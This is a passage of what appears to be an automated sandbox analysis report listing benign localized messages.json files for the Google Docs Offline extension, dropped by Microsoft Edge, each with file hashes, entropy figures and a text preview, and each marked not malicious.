                                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):914
